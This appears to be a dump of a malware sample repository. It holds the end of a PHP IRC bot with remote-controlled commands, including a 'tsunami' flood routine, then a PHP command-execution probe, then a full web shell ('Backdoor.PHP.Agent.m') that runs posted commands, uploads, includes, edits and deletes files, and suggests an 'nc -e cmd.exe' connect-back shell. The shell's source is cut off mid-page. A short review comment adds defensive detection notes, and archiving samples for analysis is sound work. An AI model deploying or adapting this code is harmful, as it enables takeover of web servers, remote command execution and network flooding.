} else { fputs($fp,'NOTICE ' . $dNick . ' :Username Not Found! Change Your Nick then Pass Again ' . CRL); }
}
elseif ($auth["$dNick"]["status"] && $com[3]==':chgpass' && $com[4] && $com[5]) {
if ($auth["$dNick"]) {
if ($auth["$dNick"]["auth"]==2) {
if ($com[4]===$auth["$dNick"]["pass"]) {
$auth["$dNick"]["pass"] = $com[5];
fputs($fp,'NOTICE ' . $dNick . ' :Your New Auth Pass set to '.$auth["$dNick"]["pass"].', Type: auth <your pass> To Authorized Imediately! ' . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' :Your Old Pass Wrong! Type: chgpass <old pass> <new pass> To Change Your Auth Pass ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Please Auth First! Type: auth <your pass> To Authorized ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Username Not Found! Change Your Nick then Pass Again ' . CRL); }
}
elseif ($auth["$dNick"]["status"] && $com[3]==':adduser' && $com[4] && $com[4]!=$nick && $com[5]) {
$com[4] = strtolower($com[4]);
if ($auth["$dNick"]["auth"]==2) {
if ($auth["$dNick"]["status"]=="Admin") {
if ($com[5]=="master" || $com[5]=="user") {
$auth["$com[4]"]["name"] = $com[4];
$auth["$com[4]"]["status"] = $com[5];
fputs($fp,'NOTICE ' . $dNick . ' :AddUser :'.$com[4].' As My '.$com[5] . CRL);
fputs($fp,'NOTICE ' . $com[4] . ' :You`re Now Known As My '.$com[5].' Added By '.$dNick.' Now Type: pass <your pass> To Set Your Pass ' . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' :salah Command! Type: adduser <nick> <master/user> ' . CRL); }
} elseif ($auth["$dNick"]["status"]=="master") {
if (!$auth["$com[4]"]) {
if ($com[5]=="user") {
$auth["$com[4]"]["name"] = $com[4];
$auth["$com[4]"]["status"] = $com[5];
fputs($fp,'NOTICE ' . $dNick . ' :AddUser :'.$com[4].' As My '.$com[5] . CRL);
fputs($fp,'NOTICE ' . $com[4] . ' :You`re Now Known As My '.$com[5].' Added By '.$dNick.' Now Type: pass <your pass33] <Spyderur Pass ' . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' :Wrong Command! Type: adduser <nick> user ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :User Already Exist! Aborting AddUser! ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Unknown Status! Your Status is '.$auth["$dNick"]["status"] . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Please Auth First! Type: auth <your pass> To Authorized ' . CRL); }
}
elseif ($auth["$dNick"]["status"] && $com[3]==':deluser' && $com[4]) {
$com[4] = strtolower($com[4]);
if ($auth["$dNick"]["auth"]==2) {
if ($auth["$dNick"]["status"]=="Admin") {
if ($auth["$com[4]"]["status"]=="master" || $auth["$com[4]"]["status"]=="user") {
unset($auth["$com[4]"]);
fputs($fp,'NOTICE ' . $dNick . ' :DelUser :'.$com[4].' From My UserList ' . CRL);
fputs($fp,'NOTICE ' . $com[4] . ' :Your Access As My User Has Been Deleted By '.$dNick . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' :Wrong Command! Type: deluser <nick> ' . CRL); }
} elseif ($auth["$dNick"]["status"]=="master") {
if ($auth["$com[4]"]["status"]=="user") {
unset($auth["$com[4]"]);
fputs($fp,'NOTICE ' . $dNick . ' :DelUser :'.$com[4].' From My UserList ' . CRL);
fputs($fp,'NOTICE ' . $com[4] . ' :Your Access As My User Has Been Deleted By '.$dNick . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' :Wrong Command! Type: deluser <nick> ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Unknown Status! Your Status is '.$auth["$dNick"]["status"] . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Please Auth First! Type: auth <your pass> To Authorized ' . CRL); }
}
elseif ($auth["$dNick"]["status"]) {
if (ereg(":`",$com[3]) || ereg(":!",$com[3])) {
$chan = strstr($dCommand,"#");
$anick = str_replace("PRIVMSG ","",$dCommand);
if ($com[3]==':!auth') {
if ($auth["$dNick"]["auth"]==2) {
fputs($fp,'NOTICE '.$dNick.' :You`re already Authorized!' . CRL);
} else {
$whois = $dNick;
fputs($fp,'WHOIS '.$dNick . CRL);
}
} elseif ($com[3]==':`auth' && $chan) {
if ($auth["$dNick"]["auth"]==2) {
fputs($fp,'PRIVMSG '.$chan.' :'.$dNick.' siap bos!' . CRL);
} else { fputs($fp,'PRIVMSG '.$chan.' :'.$dNick.' bukan bosku cok!' . CRL); }
} elseif ($auth["$dNick"]["auth"]==2) {
if ($com[3]==':`say' && $com[4] && $chan) {
$msg = strstr($data,":`say");
$msg = str_replace(":`say ","",$msg);
fputs($fp,'PRIVMSG '.$chan.' :'.$msg. CRL);
}
elseif ($com[3]==':`act' && $com[4] && $chan) {
$msg = strstr($data,":`act");
$msg = str_replace(":`act ","",$msg);
fputs($fp,'PRIVMSG '.$chan.' :ACTION '.$msg.''. CRL);
}
elseif ($com[3]==':`slap' && $com[4] && $chan) {
fputs($fp,'PRIVMSG '.$chan.' :ACTION slaps '.$com[4].' Tepat Di jidat 4pake kursi, kompor, penggorengan, plus tahi kuda... 2JeGuuuERRR... PleeTHaaQQQ ... DeeZZiiNGhHH ... 12cukuliinn dach loe ... monyong² tuh jidat ... hahahahakZ :4P~'. CRL);
}
elseif ($com[3]==':`msg' && $com[4] && $com[5]) {
$msg = strstr($data,":`msg");
$msg = str_replace(":`msg $com[4] ","",$msg);
fputs($fp,'PRIVMSG '.$com[4].' :'.$msg. CRL);
}
elseif ($com[3]==':`notice' && $com[4] && $com[5]) {
$msg = strstr($data,":`notice");
$msg = str_replace(":`notice $com[4] ","",$msg);
fputs($fp,'NOTICE '.$com[4].' :'.$msg. CRL);
}
elseif ($com[3]==':`ctcp' && $com[4] && $com[5]) {
$msg = strstr($data,":`ctcp");
$msg = str_replace(":`ctcp $com[4] ","",$msg);
fputs($fp,'PRIVMSG '.$com[4].' :'.$msg.''. CRL);
}
elseif ($com[3]==':`ping' && $chan) {
$sml = $smile[rand(0,count($smile) - 1)];
fputs($fp,'PRIVMSG '.$chan.' :'.$dNick.', PONG! '.$sml. CRL);
}
elseif ($com[3]==':`pong' && $chan) {
$sml = $smile[rand(0,count($smile) - 1)];
fputs($fp,'PRIVMSG '.$chan.' :'.$dNick.', PING! '.$sml. CRL);
}
elseif ($com[3]==':`info' && $auth["$dNick"]["status"]=="Admin") {
$bhost = $_SERVER['HTTP_HOST'];
$bphp = $_SERVER['PHP_SELF'];
fputs($fp,'NOTICE '.$dNick.' :Bot Host: '.$bhost.', Bot PHP: '.$bphp. CRL);
}
elseif ($com[3]==':`up' && $chan) {
fputs($fp, 'PRIVMSG chanserv@services.dal.net :op '.$chan.' '.$nick . CRL);
}
elseif ($com[3]==':`down' && $chan) {
fputs($fp, 'MODE '.$chan.' +v-o '.$nick.' '.$nick . CRL);
}
elseif ($com[3]==':`tsunami' && $com[4] && $auth["$dNick"]["status"]!="user") {
$nicktsu = $tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)];
fputs($fp, 'NICK '.$nicktsu . CRL);
if (substr($dCommand,0,3)=='433') {
$nicktsu = $tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)];
fputs($fp, 'NICK '.$nicktsu . CRL);
}
$msg = strstr($data,":tsunami");
$msg = str_replace(":tsunami $com[4]","",$msg);
if (ereg("#", $com[4])) {
fputs($fp, 'JOIN '.$com[4] . CRL);
}
fputs($fp, 'PRIVMSG '.$com[4].' :'.$msg.'' . CRL);
fputs($fp, 'NOTICE '.$com[4].' :'.$msg.'' . CRL);
fputs($fp, 'PRIVMSG '.$com[4].' :TSUNAMI '.$msg.'' . CRL);
fputs($fp, 'PRIVMSG '.$com[4].' :'.$msg.'' . CRL);
fputs($fp, 'NOTICE '.$com[4].' :'.$msg.'' . CRL);
fputs($fp, 'PRIVMSG '.$com[4].' :FLOOD '.$msg.'' . CRL);
if (ereg("#", $com[4])) {
fputs($fp, 'PART '.$com[4].' :Complete' . CRL);
fputs($fp, 'NICK '.$nick . CRL);
} else {
fputs($fp, 'NICK '.$nick . CRL);
}
}
elseif ($com[3]==':`cycle' && $chan && $auth["$dNick"]["status"]!="user") {
$msg = strstr($data,":`cycle");
if (ereg("#", $com[4])) {
$partchan = $com[4];
$msg = str_replace(":`cycle $com[4]","",$msg);
} else {
$partchan = $chan;
$msg = str_replace(":`cycle","",$msg);
}
if (strlen($msg)<3) {
$msg = '';
}
fputs($fp, 'PART '.$partchan.' :'.$msg . CRL);
fputs($fp, 'JOIN '.$partchan . CRL);
}
elseif ($com[3]==':`part' && $auth["$dNick"]["status"]=="Admin") {
$msg = strstr($data,":`part");
if (ereg("#", $com[4])) {
$partchan = $com[4];
$msg = str_replace(":`part $com[4]","",$msg);
} else {
$partchan = $chan;
$msg = str_replace(":`part","",$msg);
}
if (strlen($msg)<3) {
$msg = '';
}
fputs($fp, 'PART '.$partchan.' :'.$msg . CRL);
$remchan = strtolower($partchan);
if (in_array($remchan, $channel)) {
$channels = str_replace("$remchan ","",$channels);
unset($channel);
$channel = explode(" ", $channels);
}
foreach ($channel as $v) {
fputs($fp, 'JOIN '.$v . CRL);
}
}
elseif ($com[3]==':`join' && $com[4] && $auth["$dNick"]["status"]=="Admin") {
if (!ereg("#",$com[4])) { $com[4]="#".$com[4]; }
$addchan = strtolower($com[4]);
if (!in_array($addchan, $channel)) {
$channel[]=$addchan;
$channels.="$addchan ";
}
foreach ($channel as $v) {
sleep(rand(1,6));
fputs($fp, 'JOIN '.$v . CRL);
}
}
elseif ($com[3]==':`botnick' && $com[4] && !$chan && $auth["$dNick"]["status"]=="Admin") {
$nick = $com[4];
$identify = $com[5];
fputs($fp, 'NICK '.$nick . CRL);
fputs($fp, 'PRIVMSG nickserv@services.dal.net :identify '.$nick.' '.$identify. CRL);
}
elseif ($com[3]==':`k' && $com[4] && $chan) {
$msg = strstr($data,":`k");
$msg = str_replace(":`k $com[4]","",$msg);
fputs($fp, 'KICK '.$chan.' '.$com[4].' :'.$msg . CRL);
}
elseif ($com[3]==':`kb' && $com[4] && $chan) {
$msg = strstr($data,":`kb");
$msg = str_replace(":`kb $com[4]","",$msg);
fputs($fp, 'KICK '.$chan.' '.$com[4].' :'.$msg . CRL);
fputs($fp, 'MODE '.$chan.' +b '.$com[4] . CRL);
}
elseif ($com[3]==':`ganti') {
$nick = $nicky[rand(0,count($nicky) - 1)];
fputs($fp, 'NICK '.$nick . CRL);
if (substr($dCommand,0,3)=='433') {
$nick = $nicky[rand(0,count($nicky) - 1)];
fputs($fp, 'NICK '.$nick . CRL);
}
}
elseif ($com[3]==':`op' && $chan) {
if ($com[4]) { $opnick = $com[4]; }
else { $opnick = $dNick; }
fputs($fp, 'MODE '.$chan.' +ooo '.$opnick.' '.$com[5].' '.$com[6] . CRL);
}
elseif ($com[3]==':`deop' && $chan) {
if ($com[4]) { $opnick = $com[4]; }
else { $opnick = $dNick; }
fputs($fp, 'MODE '.$chan.' -o+v-oo '.$opnick.' '.$opnick.' '.$com[5].' '.$com[6] . CRL);
}
elseif ($com[3]==':`v' && $chan) {
if ($com[4]) { $vonick = $com[4]; }
else { $vonick = $dNick; }
fputs($fp, 'MODE '.$chan.' +vvv '.$vonick.' '.$com[5].' '.$com[6] . CRL);
}
elseif ($com[3]==':`dv' && $chan) {
if ($com[4]) { $vonick = $com[4]; }
else { $vonick = $dNick; }
fputs($fp, 'MODE '.$chan.' -vvv '.$vonick.' '.$com[5].' '.$com[6] . CRL);
}
elseif ($com[3]==':`awaymsg' && $auth["$dNick"]["status"]=="Admin") {
$msg = strstr($data,":`awaymsg");
$msg = str_replace(":`awaymsg","",$msg);
if (strlen($msg)<3) {
$raway="on";
fputs($fp,'AWAY : ' . 'AWAY' . CRL);
} else {
$raway="off";
fputs($fp,'AWAY : ' . $msg . CRL);
}
}
elseif ($com[3]==':`mode' && $com[4] && $chan) {
fputs($fp, 'MODE '.$chan.' :'.$com[4].' '.$com[5] . CRL);
}
elseif ($com[3]==':`nickmode' && $com[4]) {
$nickmode = $com[4];
fputs($fp, 'MODE '.$nick.' :'.$nickmode . CRL);
}
elseif ($com[3]==':`chanlist') {
fputs($fp, 'NOTICE '.$dNick.' :Channel List: '.$channels . CRL);
}
elseif ($com[3]==':`userlist') {
$userlist="";
foreach ($auth as $user) {
if ($user["pass"]) { $pass="-pass ok"; }
else { $pass="-no pass"; }
$userlist .= $user["name"].'('.$user["status"].$pass.') ';
}
fputs($fp, 'NOTICE '.$dNick.' :User List: '.$userlist . CRL);
}
elseif ($com[3]==':`quit' && $auth["$dNick"]["status"]=="Admin") {
$msg = strstr($data,":`quit");
$msg = str_replace(":`quit","",$msg);
if (strlen($msg)>3) {
$msg = str_replace(" ","_",$msg);
}
$quit1 = array("ngantor","nguantuk","sama","brb","bye_all","s33_you","excess_flood","pingtimeout","hehe","bye","mandi","makan","muuah","quit","conection_reset_bay_peer","banned","part","leaving","ada_deh","call_me","wew","toronto.hub.dal.net_brodway.dal.net","no_komen","restart");
$quitmsg = $quit1[rand(0,count($quit1) - 1)];
fputs($fp, 'QUIT ' . $quitmsg . CRL);
$keluar = 1;
exit;
}
elseif ($com[3]==':`vhost' && $auth["$dNick"]["status"]=="Admin") {
if ($com[4]) { $localhost = $com[4]; }
else { $localhost = 'localhost'; }
$keluar = 0;
fputs($fp, 'QUIT ' . CRL);
}
elseif ($com[3]==':`jump' && $auth["$dNick"]["status"]=="Admin") {
if (!eregi(".dal.net",$com[4])) {
$remotehost = "irc.dal.net";
} else { $remotehost = $com[4]; }
$keluar = 0;
fputs($fp, 'QUIT changging_server' . CRL);
}
elseif ($com[3]==':`ident' && $auth["$dNick"]["status"]=="Admin") {
if (!$com[4]) {
$username = $username;
} else { $username = $com[4]; }
$keluar = 0;
fputs($fp, 'QUIT ganti_ident' . CRL);
}
elseif ($com[3]==':`fullname' && $auth["$dNick"]["status"]=="Admin") {
if (!$com[4]) {
$realname = "--";
} else { $realname = $com[4]; }
$keluar = 0;
fputs($fp, 'QUIT ganti_fullname' . CRL);
}
elseif ($com[3]==':`topic' && $com[4] && $chan) {
$msg = strstr($data,":`topic");
$msg = str_replace(":`topic ","",$msg);
fputs($fp, 'TOPIC '.$chan.' :'.$msg . CRL);
}
elseif ($com[3]==':!help' && !$chan) {
fputs($fp,'PRIVMSG '.$dNick.' :Secret Help' . CRL);
}
} else { fputs($fp,'NOTICE '.$dNick.' :Please Auth First! Type: auth <your pass> To Authorized '. CRL); }
}
}
elseif (!$auth["$dNick"] && !eregi("auth",$iText)) {
if (eregi("www.",$iText) || eregi("http:",$iText) || eregi("join #",$iText)) {
if (!ereg("#",$dCommand)) {
if ($log=="on") {
fputs($fp,'PRIVMSG '. $Admin .' :4inviter: ' . $dFrom . '2:' .$iText. CRL);
}
$inv = strstr($dFrom,'@');
foreach ($auth as $user) {
if ($user["status"]=="user") {
fputs($fp, 'NOTICE '.$user["name"].' :KB '.$chan.' '.$dNick.' '.$inv.'' . CRL);
}
}
}
}
elseif (!ereg("#",$dCommand)) {
if ($log=="on") {
fputs($fp,'PRIVMSG '.$Admin.' :6' . $dFrom . '12:' .$iText. CRL);
}
}
}
}
}
elseif (substr($data,0,4) == 'PING') {
fputs($fp,'PONG ' . substr($data,5) . CRL);
$smile = $querym[rand(0,count($querym) - 1)];
$kata1 = $usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)];
$kata2 = $usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)];
fputs($fp,'PRIVMSG #whatz :' . $kata1 . ' ' . $kata2 . $smile . CRL);
}
}
}
fclose ($fp);
} while ($keluar==0);
}
working($nick);
?>

37
PHP/Backdoor.PHP.Agent.fo Normal file

@ -0,0 +1,37 @@
<?php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;
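Review bot: Nothing in or beside this sample records what it does, and `ex()` tries `exec`, `shell_exec`, `system`, `passthru` and `popen` in turn, each behind `@`, so a host whose `disable_functions` lists only some of them still runs the command and logs no warning. The command is the fixed string `id`, no request input is read, and the literal `Mic22` is printed first, which reads like a code-execution probe rather than an interactive shell (inferred from these lines only). A response body that begins with `Mic22` followed by `uid=` is a usable match string for web logs or an IDS rule. I would keep the triage note in a sidecar file rather than in the sample, so the file hash stays intact: `# probe: prints "Mic22" + output of id; sinks exec/shell_exec/system/passthru/popen; reads no request input`.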

349
PHP/Backdoor.PHP.Agent.m Normal file

@ -0,0 +1,349 @@
<!--
/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
/* ................jdWMMMMMNk&,...JjdMMMHMMHA+................ */
/* .^.^.^.^.^.^..JdMMMBC:vHMMNI..`dMMM8C`ZMMMNs...^^.^^.^^.^^. */
/* ..^.^..^.....dMMMBC`....dHNn...dMNI....`vMMMNy.........^... */
/* .....^..?XMMMMMBC!..dMM@MMMMMMM#MMH@MNZ,^!OMMHMMNk!..^...^. */
/* ^^.^..^.`??????!`JdN0??!??1OUUVT??????XQy!`??????!`..^..^.^ */
/* ..^..^.....^..^..?WN0`` ` +llz:` .dHR:..^.......^..^... */
/* ...^..^.^.^..^...`?UXQQQQQeyltOOagQQQeZVz`..^.^^..^..^..^.. */
/* ^.^..^..^..^..^.^..`zWMMMMH0llOXHMMMM9C`..^.....^..^..^..^. */
/* ..^..^...^..+....^...`zHHWAwtltwAXH8I....^...?+....^...^..^ */
/* ...^..^...JdMk&...^.^..^zHNkAAwWMHc...^.....jWNk+....^..^.. */
/* ^.^..^..JdMMMMNHo....^..jHMMMMMMMHl.^..^..jWMMMMNk+...^..^. */
/* .^....jdNMM9+4MMNmo...?+zZV7???1wZO+.^..ddMMM6?WMMNmc..^..^ */
/* ^.^.jqNMM9C!^??UMMNmmmkOltOz+++zltlOzjQQNMMY?!`??WMNNmc^.^. */
/* ummQHMM9C!.uQo.??WMMMMNNQQkI!!?wqQQQQHMMMYC!.umx.?7WMNHmmmo */
/* OUUUUU6:.jgWNNmx,`OUWHHHHHSI..?wWHHHHHW9C!.udMNHAx.?XUUUU9C */
/* .......+dWMMMMMNm+,`+ltltlzz??+1lltltv+^.jdMMMMMMHA+......^ */
/* ..^..JdMMMMC`vMMMNkJuAAAAAy+...+uAAAAA&JdMMMBC`dMMMHs....^. */
/* ....dMMMMC``.``zHMMMMMMMMMMS==zXMMMMMMMMMM8v``.`?ZMMMNs.... */
/* dMMMMMBC!`.....`!?????1OVVCz^^`+OVVC??????!`....^`?vMMMMMNk */
/* ??????!`....^.........?ztlOz+++zlltz!........^.....???????! */
/* .....^.^^.^..^.^^...uQQHkwz+!!!+zwWHmmo...^.^.^^.^..^....^. */
/* ^^.^.....^.^..^...ugHMMMNkz1++++zXMMMMHmx..^....^.^..^.^..^ */
/* ..^.^.^.....^...jdHMMMMM9C???????wWMMMMMHn+...^....^..^..^. */
/* ^....^.^.^....JdMMMMMMHIz+.......?zdHMMMMMNA....^..^...^..^ */
/* .^.^....^...JdMMMMMMHZttOz1111111zlttwWMMMMMNn..^.^..^..^.. */
/* ..^.^.^....dNMMMMMWOOtllz!^^^^^^^+1lttOZWMMMMMNA,....^..^.. */
/* ^....^..?dNMMMMMC?1ltllllzzzzzzzzzlllltlz?XMMMMNNk+^..^..^. */
/* .^.^..+dNMM8T77?!`+lllz!!!!!!!!!!!!+1tll+`??777HMNHm;..^..^ */
/* ..^..^jHMMNS`..^.`+ltlz+++++++++++++ztll+`....`dMMMHl.^..^. */
/* ....^.jHMMNS`^...`+ltlz+++++++++++++zltl+`^.^.`dMMMHl..^..^ */
/* ^^.^..jHMMNS`.^.^`+tllz+...........?+ltl+`.^..`dMMMHl...^.. */
/* ..^..^jHMMM6`..^.`+lltltltlz111zltlltlll+`...^`dMMMHl.^..^. */
/* ....^.jHNC``.^...`+zltlltlz+^^.+zltlltzz+`..^.^`?dMHl..^..^ */
/* .^.^..jHNI....^..^``+zltltlzzzzzltltlv!``.^...^..dMHc....^. */
/* ^...jdNMMNmo...^...^`?+ztlltllltlltz!``..^.^...dqNMMNmc.^.. */
/* .^.`?7TTTTC!`..^.....^`?!!!!!!!!!!!!`..^....^.`?7TTTTC!..^. */
/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
/*
/* We should take care some kind of history, i will add here to keep a trace of changes (who made it).
/* Also I think we should increase the last version number by 1 if you make some changes.
/*
/* CHANGES / VERSION HISTORY:
/* ====================================================================================
/* Version Nick Description
/* - - - - - - - - - - - - - - - - - - - - - - - - - - -
/* 0.3.1 666 added an ascii bug :)
/* 0.3.1 666 password protection
/* 0.3.1 666 GET and POST changes
/* 0.3.2 666 coded a new uploader
/* 0.3.2 666 new password protection
/* 0.3.3 666 added a lot of comments :)
/* 0.3.3 666 added "Server Info"
/* 1.0.0 666 added "File Inclusion"
/* 1.0.0 666 removed password protection (nobody needs it...)
/* 1.0.0 666 added "Files & Directories"
/* 1.3.3 666 added "File Editor"
/* 2.0.0 666 added "Notices"
/* 2.0.0 666 added some new modules
/* 2.0.0 666 made some design updates
/*
/*
-->
<?
//
// Default Changes
// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
$owner = "SR-Crew"; // Insert your nick
$version = "2.0.0"; // The version
// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
//
?>
<body link="#000000" vlink="#000000" alink="#000000" bgcolor="#FFFFD5">
<style type="text/css">
body{
cursor:crosshair
}
</style>
<div align="center" style="width: 100%; height: 100">
<pre width="100%" align="center"><strong> ____ _ ____ _ _ _
| _ \ ___ ___ | |_ / ___|| |__ ___| | |
| |_) / _ \ / _ \| __| \___ \| '_ \ / _ \ | |
| _ < (_) | (_) | |_ _ ___) | | | | __/ | |
|_| \_\___/ \___/ \__| (_) |____/|_| |_|\___|_|_|</pre>
</div></strong>
<b><u><center><font face='Verdana' style='font-size: 8pt'><?php echo "This server has been infected by $owner"; ?></font></center></u></b>
<hr color="#000000" size="2,5">
<div align="center">
<center>
<p>
<?php
// Check for safe mode
if( ini_get('safe_mode') ) {
print '<font face="Verdana" color="#FF0000" style="font-size:10pt"><b>Safe Mode ON</b></font>';
} else {
print '<font face="Verdana" color="#008000" style="font-size:10pt"><b>Safe Mode OFF</b></font>';
}
?>
&nbsp;</p><font face="Webdings" size="6">!</font><br>
&nbsp;<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="100%" id="AutoNumber1" height="25" bordercolor="#000000">
<tr>
<td width="1%" height="25" bgcolor="#FCFEBA">
<p align="center"><font face="Verdana" size="2">[ Server Info ]</font></td>
</tr>
<tr>
<td width="49%" height="142">
<p align="center">
<font face="Verdana" style="font-size: 8pt"><b>Current Directory:</b> <? echo $_SERVER['DOCUMENT_ROOT']; ?>
<br />
<b>Shell:</b> <? echo $SCRIPT_FILENAME ?>
<br>
<b>Server Software:</b> <? echo $SERVER_SOFTWARE ?><br>
<b>Server Name:</b> <? echo $SERVER_NAME ?><br>
<b>Server Protocol:</b> <? echo $SERVER_PROTOCOL ?><br>
</font></tr>
</table><br />
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="100%" id="AutoNumber1" height="426" bordercolor="#000000">
<tr>
<td width="49%" height="25" bgcolor="#FCFEBA" valign="middle">
<p align="center"><font face="Verdana" size="2">[ Command Execute ]</font></td>
<td width="51%" height="26" bgcolor="#FCFEBA" valign="middle">
<p align="center"><font face="Verdana" size="2">[ File Upload ]</font></td>
</tr>
<tr>
<td width="49%" height="142">
<p align="center"><form method="post">
<p align="center">
<br>
<font face="Verdana" style="font-size: 8pt">Insert your commands here:</font><br>
<br>
<textarea size="70" name="command" rows="2" cols="40" ></textarea> <br>
<br><input type="submit" value="Execute!"><br>
&nbsp;<br></p>
</form>
<p align="center">
<textarea readonly size="1" rows="7" cols="53"><?php @$output = system($_POST['command']); ?></textarea><br>
<br>
<font face="Verdana" style="font-size: 8pt"><b>Info:</b> For a connect
back Shell, use: <i>nc -e cmd.exe [SERVER] 3333<br>
</i>after local command: <i>nc -v -l -p 3333 </i>(Windows)</font><br /><br /> <td><p align="center"><br>
<form enctype="multipart/form-data" method="post">
<p align="center"><br>
<br>
<font face="Verdana" style="font-size: 8pt">Here you can upload some files.</font><br>
<br>
<input type="file" name="file" size="20"><br>
<br>
<font style="font-size: 5pt">&nbsp;</font><br>
<input type="submit" value="Upload File!"> <br>
&nbsp;</p>
</form>
<?php
function check_file()
{
global $file_name, $filename;
$backupstring = "copy_of_";
$filename = $backupstring."$filename";
if( file_exists($filename))
{
check_file();
}
}
if(!empty($file))
{
$filename = $file_name;
if( file_exists($file_name))
{
check_file();
echo "<p align=center>File already exist</p>";
}
else
{
copy($file,"$filename");
if( file_exists($filename))
{
echo "<p align=center>File uploaded successful</p>";
}
elseif(! file_exists($filename))
{
echo "<p align=center>File not found</p>";
}
}
}
?>
<font face="Verdana" style="font-size: 8pt">
<p align=\"center\"></font>
</td>
</tr>
<tr>
<td style="overflow:auto" width="49%" height="25" bgcolor="#FCFEBA">
<p align="center"><font face="Verdana" size="2">[ Files & Directories ]</font></td>
<td width="51%" height="19" bgcolor="#FCFEBA">
<p align="center"><font face="Verdana" size="2">[ File Inclusion ]</font></td>
</tr>
<tr>
<td style="overflow:auto" width="49%" height="231">
<font face="Verdana" style="font-size: 11pt">
<p align="center">
<br>
<div align="center" style="overflow:auto; width:99%; height:175">
<?
$folder=opendir('./');
while ($file = readdir($folder)) {
if($file != "." && $file != "..")
echo '<a target="blank" href='.$file.'>'.$file.'</a><br>';
}
closedir($folder);
?>
</div><p align="center">&nbsp;</td>
<td width="51%" height="232">
<p align="center"><font face="Verdana" style="font-size: 8pt"><br>
Include
something :)<br>
<br>
&nbsp;</font><form method="POST">
<p align="center">
<input type="text" name="incl" size="20"><br>
<br>
<input type="submit" value="Include!" name="inc"></p>
</form>
<?php @$output = include($_POST['incl']); ?>
</td>
</tr>
<tr>
<td width="49%" height="25" bgcolor="#FCFEBA">
<p align="center"><font face="Verdana" size="2">[ File Editor ]</font></td>
<td width="51%" height="19" bgcolor="#FCFEBA">
<p align="center"><font face="Verdana" size="2">[ Notices ]</font></td>
</tr>
<tr>
<td width="49%" height="231">
<font face="Verdana" style="font-size: 11pt">
<p align="center"><?
$scriptname = $_SERVER['SCRIPT_NAME'];
$filename = $_POST["filename"];
if($_POST["submit"] == "Open")
{
if(file_exists($filename))
{
$filecontents = htmlentities(file_get_contents($filename));
if(!$filecontents)
$status = "<font face='Verdana' style='font-size: 8pt'>Error or No contents in file</font>";
}
else
$status = "<font face='Verdana' style='font-size: 8pt'>File does not exist!</font>";
}
else if($_POST["submit"] == "Delete")
{
if(file_exists($filename))
{
if(unlink($filename))
$status = "<font face='Verdana' style='font-size: 8pt'>File successfully deleted!</font>";
else
$status = "<font face='Verdana' style='font-size: 8pt'>Could not delete file!</font>";
}
else
$status = "<font face='Verdana' style='font-size: 8pt'>File does not exist!</font>";
}
else if($_POST["submit"] == "Save")
{
$filecontents = stripslashes(html_entity_decode($_POST["contents"]));
if(file_exists($filename))
unlink($filename);
$handle = fopen($filename, "w");
if(!$handle)
$status = "<font face='Verdana' style='font-size: 8pt'>Could not open file for write access! </font>";
else
{
if(!fwrite($handle, $filecontents))
$status = $status."<font face='Verdana' style='font-size: 8pt'>Could not write to file! (Maybe you didn't enter any text?)</font>";
fclose($handle);
}
$filecontents = htmlentities($filecontents);
}
else
{
$status = "<font face='Verdana' style='font-size: 8pt'>No file loaded!</font>";
}
?>
<table border="0" align="center">
<tr>
<td>
<table width="100%" border="0">
<tr>
<td>
<form method="post" action="<?echo $scriptname;?>">
